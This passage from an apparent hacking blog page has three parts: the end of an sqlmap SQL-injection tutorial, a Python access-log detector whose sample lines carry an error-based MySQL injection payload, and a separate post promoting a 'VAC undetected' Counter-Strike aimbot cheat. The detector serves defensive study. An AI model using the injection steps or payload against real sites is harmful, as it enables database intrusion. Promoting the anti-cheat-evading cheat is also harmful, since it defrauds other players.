http://www.site.com/class_name/method/43/80.
In such cases sqlmap needs to be told the injection point, marked by a *

http://www.site.com/class_name/method/43*/80
The above will tell sqlmap to inject at the point marked by *.
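Seen from the web server's side, everything in this tutorial leaves traces in the access log: the default sqlmap User-Agent (which identifies itself as sqlmap/<version> unless --random-agent is used), the single-quote probe followed by a 5xx response, and the error-based payload shapes shown in the sqlmap output above (FLOOR(RAND(0)*2) with GROUP BY, and INFORMATION_SCHEMA enumeration). The detector below is an added example written for this page, not code from sqlmap or from the tutorial's author; it assumes Apache/nginx combined log format, and the four log lines are constructed, with the third one carrying the payload printed earlier in this article.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format access log lines. Line 3 reuses the error-based
# payload shape that sqlmap reported above, URL-encoded as a browser would send it.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Oct/2012:12:10:33 +0530] "GET /section.php?id=51 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/16.0"',
    '192.0.2.10 - - [28/Oct/2012:12:10:34 +0530] "GET /section.php?id=51%27 HTTP/1.1" 500 312 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '192.0.2.10 - - [28/Oct/2012:12:10:35 +0530] "GET /section.php?id=51%20AND%20(SELECT%201489%20FROM(SELECT%20COUNT(*),CONCAT(0x3a73776c3a,(SELECT%20(CASE%20WHEN%20(1489=1489)%20THEN%201%20ELSE%200%20END)),0x3a7a76653a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 312 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/22.0"',
    '192.0.2.77 - - [28/Oct/2012:12:11:02 +0530] "GET /class_name/method/43/80 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Macintosh) Safari/536.26"',
]

# Combined log format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# sqlmap's default User-Agent starts with "sqlmap/"; --random-agent replaces it.
UA_SQLMAP = re.compile(r"\bsqlmap/", re.I)

# Payload shapes drawn from the sqlmap output shown in this article.
PAYLOAD_PATTERNS = [
    ("error-based MySQL probe (FLOOR(RAND(0)*2) duplicate-key trick)",
     re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("INFORMATION_SCHEMA enumeration", re.compile(r"\bINFORMATION_SCHEMA\.", re.I)),
    ("boolean tautology (AND/OR n=n)", re.compile(r"\b(AND|OR)\s+\(?\s*\d+\s*=\s*\d+", re.I)),
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(line):
    """Return the parsed record with a list of detection 'hits' (empty if benign)."""
    rec = parse_line(line)
    if rec is None:
        return None
    decoded = unquote_plus(rec["path"])  # inspect the request as the app sees it
    hits = []
    if UA_SQLMAP.search(rec["ua"]):
        hits.append("default sqlmap user agent")
    for name, pattern in PAYLOAD_PATTERNS:
        if pattern.search(decoded):
            hits.append(name)
    # The manual test from the tutorial: a quote in a parameter that makes the app fail.
    if "'" in decoded and rec["status"].startswith("5"):
        hits.append("quote in parameter followed by 5xx response")
    return {"ip": rec["ip"], "ts": rec["ts"], "path": decoded, "status": rec["status"], "hits": hits}


def find_injection_attempts(lines):
    """Only the records with at least one hit, in log order."""
    return [c for c in map(classify, lines) if c is not None and c["hits"]]


if __name__ == "__main__":
    for rec in find_injection_attempts(SAMPLE_LOG):
        print(rec["ts"], rec["ip"], rec["status"], "; ".join(rec["hits"]))
```

The User-Agent check is the weakest signal because --random-agent defeats it, which is why the payload and quote-plus-5xx checks are there: they look at what was sent and how the application reacted, and a burst of 5xx responses to one client on a single parameter is a strong sign of the probing this tutorial walks through.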

That's all, friends. Special thanks to Silver Moon for the article.
Monday, October 8, 2012
R-aimbot D3D Mode aimbot Hack for Counter Strike 1.6 VAC Undetected

Hey friends, R-Aimbot is the latest aimbot hack for Counter Strike 1.6 on the market. R-Aimbot is undetected by VAC and works perfectly well on Windows 7 32-bit / Windows 7 64-bit / Windows XP. We know most hacks require OpenGL mode to work, but the cool news is that the R-Aimbot aimbot hack for Counter Strike 1.6 works in all three modes: D3D mode (DirectX mode), Software mode and OpenGL mode. It's a clean and perfect aimbot hack that works with D3D mode on Windows 7 64-bit.


Some cool features of the R-aimbot aimbot hack:
  • Aimbot
  • AutoAim
  • KnifeAim
  • AutoWall
  • AutoShoot
  • AutoPistol
  • Team
  • NoRecoil
  • NoSpread
Support:
  • Counter-Strike 1.6 (4554)
  • Windows XP/Vista/7 x32 & x64

How to use the R-aimbot aimbot hack?
1. Start the R-aimbot.exe file by double-clicking on it.
2. Start Counter Strike hl.exe.
3. Enjoy the game :P



If you have any issues, ask us in the form of comments.
